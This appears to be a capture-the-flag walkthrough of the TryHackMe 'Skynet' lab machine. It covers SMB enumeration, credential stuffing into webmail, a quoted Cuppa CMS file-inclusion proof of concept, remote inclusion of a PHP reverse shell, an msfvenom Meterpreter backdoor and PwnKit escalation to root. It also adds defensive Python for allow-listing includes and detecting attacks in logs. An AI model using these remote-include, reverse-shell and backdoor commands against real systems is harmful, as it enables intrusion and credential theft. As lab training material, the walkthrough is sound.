Connect to the THM server and start the target machine
Target IP: 10.10.118.152
Assigned (attacker) IP: 10.11.120.102
Information gathering
Use rustscan to find open TCP ports on the target
rustscan -a 10.10.118.152 -r 1-65535 --ulimit 5000
Use nmap to run script and service scans against the open TCP ports
nmap -p22,80,110,139,143,445 -sCV 10.10.118.152
Use nmap to run vulnerability and OS detection scans against the open TCP ports
nmap -p22,80,110,139,143,445 --script=vuln -O 10.10.118.152
Use nmap to scan the target's most common UDP ports
nmap -sU --top-ports 20 -Pn 10.10.118.152
Use nmap for a targeted scan of UDP port 137
nmap -sU -p 137 -sCV --script=vuln 10.10.118.152
Use enum4linux to enumerate users and shares on the target's SMB service
enum4linux -U -S 10.10.118.152
Use smbclient to connect to the target's anonymous share
smbclient -N \\\\10.10.118.152\\anonymous
- Browse the share and download attention.txt and log1.txt
- View the contents of both files
cat attention.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
cat log1.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
- log1.txt looks like a password list, since the milesdyson username itself does not appear in it
Use curl to access port 80 on the target
curl -I http://10.10.118.152:80
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.118.152:80
HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 12:34:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Tue, 17 Sep 2019 08:58:28 GMT
ETag: "20b-592bbec81c0b6"
Accept-Ranges: bytes
Content-Length: 523
Vary: Accept-Encoding
Content-Type: text/html
Use ffuf to fuzz web paths on the target's port 80
ffuf -u http://10.10.118.152:80/FUZZ -w ../dictionary/Common-dir.txt
Use a browser to open the /squirrelmail endpoint
Use Burp Suite to attempt credential stuffing against the milesdyson user
- Sort by response code and find the 302 response
Account: milesdyson
Password: cyborg007haloterminator
Log into the user's webmail panel with the credentials above
- Open the mail with subject "Samba Password reset" to obtain the user's SMB password
Account: milesdyson
Password: )s{A&2Z=F^n_E.B`
Initial foothold
Use enum4linux with milesdyson's SMB credentials to enumerate the SMB shares again
enum4linux -u 'milesdyson' -p ')s{A&2Z=F^n_E.B`' -S 10.10.118.152
Use smbclient with milesdyson's credentials to connect to the target's milesdyson share
smbclient -N \\\\10.10.118.152\\milesdyson -U 'WORKGROUP/milesdyson%)s{A&2Z=F^n_E.B`'
- Find important.txt under the \notes directory and download it
- View the contents of important.txt
cat important.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
- From the first item in that file, the path /45kra24zxs28v3yd exists on the web server
Use a browser to open the /45kra24zxs28v3yd endpoint
Use ffuf to fuzz paths under that endpoint
ffuf -u http://10.10.118.152/45kra24zxs28v3yd/FUZZ -w ../dictionary/Common-dir.txt
Use a browser to open /45kra24zxs28v3yd/administrator/
- The page shows that this endpoint is running Cuppa CMS
Use searchsploit to search for that web application
searchsploit cuppa
- Copy the PoC into the current directory
searchsploit -m 25971.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 25971.txt
Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
URL: https://www.exploit-db.com/exploits/25971
Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
Codes: OSVDB-94101
Verified: True
File Type: C++ source, ASCII text, with very long lines (876)
Copied to: /home/kali/Desktop/temp/25971.txt
- The searchsploit output shows the vulnerability ID is OSVDB-94101
View the PoC contents
cat 25971.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat 25971.txt
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux
[ASCII-art banner omitted]
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------
Base64 Encode Output:
-----------------------------------------------------------------------------
[base64 output omitted]
-----------------------------------------------------------------------------
Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "Db@dmin";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
-----------------------------------------------------------------------------
Able to read sensitive information via File Inclusion (PHP Stream)
################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
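Line 22 in the PoC (`include($_REQUEST["urlConfig"])`) is the entire defect: a request parameter is used directly as an include path, so stream wrappers, remote URLs and traversal sequences all reach `include()`. The following is an added defender-side example, not code from this write-up or from Cuppa CMS; it models the fix in Python: the untrusted value is treated as a key into a fixed allow-list rather than as a path, and the resolved path is additionally checked to stay inside the intended directory. The directory layout, file names and allow-list keys are constructed for the example.

```python
"""Hardened replacement for an include() driven by a request parameter.

Added example (not Cuppa CMS code). The untrusted value selects an entry from
a fixed allow-list; it is never interpreted as a path, URL or stream wrapper.
"""
import os
import tempfile


class IncludeRejected(ValueError):
    """Raised when the requested include is not permitted."""


def resolve_include(requested, base_dir, allowed):
    """Return the absolute path to include, or raise IncludeRejected.

    requested : untrusted value taken from the request
    base_dir  : directory that legitimately holds the includable files
    allowed   : mapping from permitted keys to file names under base_dir
    """
    # Allow-list, not deny-list: anything not explicitly known is refused,
    # which covers php://, http://, ../ and any encoding trick at once.
    if requested not in allowed:
        raise IncludeRejected(f"not an allowed config field: {requested!r}")

    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, allowed[requested]))

    # Defence in depth: even a mis-edited allow-list entry must not escape base_dir.
    if os.path.commonpath([base, target]) != base:
        raise IncludeRejected(f"resolved outside base dir: {target}")
    if not os.path.isfile(target):
        raise IncludeRejected(f"missing include: {target}")
    return target


def demo():
    """Build a throw-away config directory (constructed) and exercise the resolver.

    Returns a dict mapping each tried value to the accepted file name or "rejected".
    """
    with tempfile.TemporaryDirectory() as tmp:
        fields = os.path.join(tmp, "fields")
        os.mkdir(fields)
        with open(os.path.join(fields, "text.php"), "w") as fh:
            fh.write("<?php // constructed stand-in for a real field template ?>\n")

        # "date" is listed but its file is deliberately absent to show that case.
        allowed = {"text": "text.php", "date": "date.php"}

        tried = [
            "text",
            "date",
            "php://filter/convert.base64-encode/resource=../Configuration.php",
            "http://203.0.113.5/shell.txt",
            "../../../../etc/passwd",
        ]
        results = {}
        for value in tried:
            try:
                results[value] = os.path.basename(resolve_include(value, fields, allowed))
            except IncludeRejected:
                results[value] = "rejected"
        return results


if __name__ == "__main__":
    for value, outcome in demo().items():
        print(f"{outcome:10s}  {value}")
```

Only the allow-listed key that maps to an existing file is accepted; the three PoC-style values are refused before any path handling happens, and the missing-file case is refused as well rather than falling through to a PHP warning.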
Use curl to build a URL modelled on the PoC and send the request
curl -v http://10.10.118.152/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
- Decode the base64 data from the response
echo 'PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gInBhc3N3b3JkMTIzIjsKCQlwdWJsaWMgJHRhYmxlX3ByZWZpeCA9ICJjdV8iOwoJCXB1YmxpYyAkYWRtaW5pc3RyYXRvcl90ZW1wbGF0ZSA9ICJkZWZhdWx0IjsKCQlwdWJsaWMgJGxpc3RfbGltaXQgPSAyNTsKCQlwdWJsaWMgJHRva2VuID0gIk9CcUlQcWxGV2YzWCI7CgkJcHVibGljICRhbGxvd2VkX2V4dGVuc2lvbnMgPSAiKi5ibXA7ICouY3N2OyAqLmRvYzsgKi5naWY7ICouaWNvOyAqLmpwZzsgKi5qcGVnOyAqLm9kZzsgKi5vZHA7ICoub2RzOyAqLm9kdDsgKi5wZGY7ICoucG5nOyAqLnBwdDsgKi5zd2Y7ICoudHh0OyAqLnhjZjsgKi54bHM7ICouZG9jeDsgKi54bHN4IjsKCQlwdWJsaWMgJHVwbG9hZF9kZWZhdWx0X3BhdGggPSAibWVkaWEvdXBsb2Fkc0ZpbGVzIjsKCQlwdWJsaWMgJG1heGltdW1fZmlsZV9zaXplID0gIjUyNDI4ODAiOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luID0gMDsKCQlwdWJsaWMgJHNlY3VyZV9sb2dpbl92YWx1ZSA9ICIiOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3JlZGlyZWN0ID0gIiI7Cgl9IAo/Pg==' | base64 -d
Database: cuppa
Account: root
Password: password123
- Since the target does not expose the database externally, try remote file inclusion to get a shell instead
Edit the listener IP and port variables in Kali's bundled php-reverse-shell.php reverse shell script
- Start a local HTTP server so the target can fetch the reverse shell script
python -m http.server 8888
# Do not use `php -S 0:PORT` to serve it here: PHP's built-in server would execute the script and spawn the reverse shell locally
- Start listening locally with nc on the port set in the reverse shell script
rlwrap -cAr nc -lvnp 1425
Use curl to build a URL that makes the target include the reverse shell script from the local HTTP server
curl http://10.10.118.152/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.11.120.102:8888/php-reverse-shell.php
- The Python HTTP server receives the request
┌──(root㉿kali)-[/home/kali/Desktop/WebShell]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.10.118.152 - - [22/Dec/2024 09:21:36] "GET /php-reverse-shell.php HTTP/1.0" 200 -
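Every step above leaves a trace in the web server's access log: the `php://filter` read of Configuration.php, the remote include of the reverse shell, and (in the PoC) the `../etc/passwd` traversal all travel in the `urlConfig` query parameter. As an added detection example, not part of this write-up, the Python below parses Apache combined-format access log lines and flags requests to `alertConfigField.php` whose `urlConfig` value carries a stream wrapper, a remote URL, or a traversal sequence. The log lines are constructed for the example (the 192.0.2.x addresses are documentation-range placeholders); the classifier generalizes beyond the page by also catching other wrappers such as `data://` or `expect://`.

```python
"""Flag file-inclusion attempts in Apache combined-format access logs.

Added, defender-side example (not part of the original write-up). It matches
the three request shapes used against Cuppa CMS: PHP stream wrappers, remote
URLs and path traversal in the urlConfig parameter. Log lines are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# ip ident user [time] "METHOD path PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

TARGET_SCRIPT = "alertConfigField.php"   # the vulnerable script from the PoC
PARAM = "urlConfig"                      # the parameter passed to include()

# Constructed sample log (the first two lines mirror the requests made above).
SAMPLE_LOG = [
    '10.11.120.102 - - [22/Dec/2024:12:40:01 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/'
    'alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php '
    'HTTP/1.1" 200 1234 "-" "curl/8.5.0"',
    '10.11.120.102 - - [22/Dec/2024:12:41:10 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/'
    'alertConfigField.php?urlConfig=http://10.11.120.102:8888/php-reverse-shell.php '
    'HTTP/1.1" 200 0 "-" "curl/8.5.0"',
    '192.0.2.7 - - [22/Dec/2024:12:42:00 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/'
    'alertConfigField.php?urlConfig=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2011 "-" "Mozilla/5.0"',
    '192.0.2.8 - - [22/Dec/2024:12:43:00 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/'
    'alertConfigField.php?urlConfig=fields/default.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [22/Dec/2024:12:44:00 +0000] "GET /index.php HTTP/1.1" 200 523 "-" "Mozilla/5.0"',
]


def classify_value(value):
    """Return the list of reasons an urlConfig value looks like an inclusion attack."""
    v = unquote(value).lower()          # second decode catches double-encoded input
    reasons = []
    if re.match(r"^[a-z][a-z0-9+.-]*://", v):
        if v.startswith(("http://", "https://", "ftp://")):
            reasons.append("remote-url")
        else:
            reasons.append("php-wrapper")   # php://, data://, expect://, phar:// ...
    if "../" in v or "..\\" in v:
        reasons.append("path-traversal")
    return reasons


def flag_inclusion_attempts(lines):
    """Return (ip, status, value, reasons) for each suspicious request in lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                        # not a combined-format line
        parts = urlsplit(m.group("path"))
        if not parts.path.endswith(TARGET_SCRIPT):
            continue
        # parse_qs percent-decodes values and splits on the first '=' only,
        # so a value containing '=' (the php://filter resource) survives intact.
        for value in parse_qs(parts.query).get(PARAM, []):
            reasons = classify_value(value)
            if reasons:
                hits.append((m.group("ip"), int(m.group("status")), value, reasons))
    return hits


if __name__ == "__main__":
    for ip, status, value, reasons in flag_inclusion_attempts(SAMPLE_LOG):
        print(f"{ip:15s} {status} {','.join(reasons):25s} {value}")
```

A 200 status on a flagged line is the important signal: the PoC's read of Configuration.php returns 200 with the base64 body, so filtering on error codes alone would miss it. The benign `fields/default.php` request and the unrelated `/index.php` hit produce no alert.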
The local nc listener receives the reverse shell
- Upgrade the TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'
- Find user.txt under /home/milesdyson
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@skynet:/home/milesdyson$ ls
ls
backups mail share user.txt
Privilege escalation
Have the target download the local linpeas.sh privilege-escalation enumeration script
curl -O http://10.11.120.102/linpeas.sh
www-data@skynet:/var/www/html/admin$ cd /tmp
cd /tmp
www-data@skynet:/tmp$ ls
ls
systemd-private-e3aa1feddce44ffaa493ef65dc8f48f9-dovecot.service-UAus7R
systemd-private-e3aa1feddce44ffaa493ef65dc8f48f9-systemd-timesyncd.service-YRuskz
www-data@skynet:/tmp$ curl -O http://10.11.120.102/linpeas.sh
curl -O http://10.11.120.102/linpeas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 805k 100 805k 0 0 389k 0 0:00:02 0:00:02 --:--:-- 389k
www-data@skynet:/tmp$ ls
ls
linpeas.sh
systemd-private-e3aa1feddce44ffaa493ef65dc8f48f9-dovecot.service-UAus7R
systemd-private-e3aa1feddce44ffaa493ef65dc8f48f9-systemd-timesyncd.service-YRuskz
Make the script executable and run it
www-data@skynet:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@skynet:/tmp$ ./linpeas.sh
./linpeas.sh
Locate the "Executing Linux Exploit Suggester" section
- It lists too many candidate CVEs to test by hand one at a time, so use MSF directly
Check the target's architecture
uname -a
www-data@skynet:/tmp$ uname -a
uname -a
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
Use msfvenom to generate a 64-bit Meterpreter payload
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.11.120.102 LPORT=1426 -f elf > shell.elf
Start Metasploit
msfconsole
Switch to the handler module
use exploit/multi/handler
Check which options the module needs
show options
- The module needs LHOST, LPORT and PAYLOAD
msf6 exploit(multi/handler) > set LHOST 10.11.120.102
LHOST => 10.11.120.102
msf6 exploit(multi/handler) > set LPORT 1426
LPORT => 1426
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
Have the target download the local shell.elf binary backdoor
curl -O http://10.11.120.102/shell.elf
- Make shell.elf executable on the target
chmod +x shell.elf
- Run the binary directly on the target
./shell.elf
The local MSF handler receives the callback
- Background the Meterpreter session
background
meterpreter > background
[*] Backgrounding session 2...
Switch to the automated local exploit suggester module
use post/multi/recon/local_exploit_suggester
Check which options the module needs
show options
- The module needs SESSION
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > run
- Because of an unstable network, the module was forced to stop after running only part of its checks
Use the exploit module suggested by the suggester to attempt privilege escalation
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
Check which options the module needs
show options
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 10.11.120.102
LHOST => 10.11.120.102
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 1427
LPORT => 1427
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 2
SESSION => 2
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > exploit
- Successfully escalated to root
Use Meterpreter's search feature to find root.txt
search -f root.txt
meterpreter > search -f root.txt
Found 1 result...
=================

Path            Size (bytes)  Modified (UTC)
----            ------------  --------------
/root/root.txt  33            2019-09-17 23:41:47 -0400